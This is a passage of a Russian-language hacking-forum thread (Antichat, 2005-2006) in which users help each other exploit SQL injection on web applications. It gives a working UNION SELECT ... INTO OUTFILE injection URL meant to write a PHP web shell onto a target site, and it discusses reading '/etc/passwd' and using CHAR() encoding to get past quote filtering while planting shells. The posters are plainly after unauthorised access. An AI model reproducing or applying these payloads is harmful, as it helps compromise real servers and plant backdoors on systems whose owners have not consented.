HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 07.11.2005, 17:21
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

insidex, LOAD_FILE('http://www.hiliv.narod.ru/shell.txt') так нельзя, можно читать только локальные файлы. Также у тебя должны быть права на чтение этого файла и он не должен превышать определенного размера, установленного на сервере.
 
Ответить с цитированием

  #12  
Старый 07.11.2005, 22:18
insidex
Познающий
Регистрация: 13.10.2005
Сообщений: 41
С нами: 10828756

Репутация: 1
По умолчанию

Спасибо за информацию! Ну тогла скажите,возможно ли записать через эту уязвимость в файл на сервере то,что у k1b0rg в подписи
 
Ответить с цитированием

  #13  
Старый 07.11.2005, 22:40
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

А так как я тебе предлагал, не работает?
Цитата:
http://mysite.com/chat/usersL.php3?L=russian&R='+UNION+SELECT+'<?php',nul l,null,null+FROM+register_user+into+outfi le+'../shell.php'/*
 
Ответить с цитированием

  #14  
Старый 07.11.2005, 22:52
insidex
Познающий
Регистрация: 13.10.2005
Сообщений: 41
С нами: 10828756

Репутация: 1
По умолчанию

К сожалению нет,пишет зараза:
MySQL error: 1267 (Illegal mix of collations (utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation 'UNION')
 
Ответить с цитированием

  #15  
Старый 11.10.2006, 20:13
Yuryus
Новичок
Регистрация: 09.05.2006
Сообщений: 13
С нами: 10530310

Репутация: 3
По умолчанию

Подскажите Ньюбу
Есть инъекция. Хочу сформировать запрос на заливку шела.
Кавычки не прокатывают. Хочу использовать функцию Char.
Внимание вопрос. Есть ли какой то простой вариант приобразовывать строку в Char символы?
Т.е. В виде примера ('/etc/passwd') в строку типа ,(char(47,101,116,99,47,112,97,115,115,119,100))
соответственно хочется конвертить свою строку.
Заранее спасиба.
 
Ответить с цитированием

  #16  
Старый 12.10.2006, 01:57
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

http://quest.antichat.net/code.php

мм....?
__________________
 
Ответить с цитированием

  #17  
Старый 13.10.2006, 00:58
Yuryus
Новичок
Регистрация: 09.05.2006
Сообщений: 13
С нами: 10530310

Репутация: 3
По умолчанию

Tnx
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.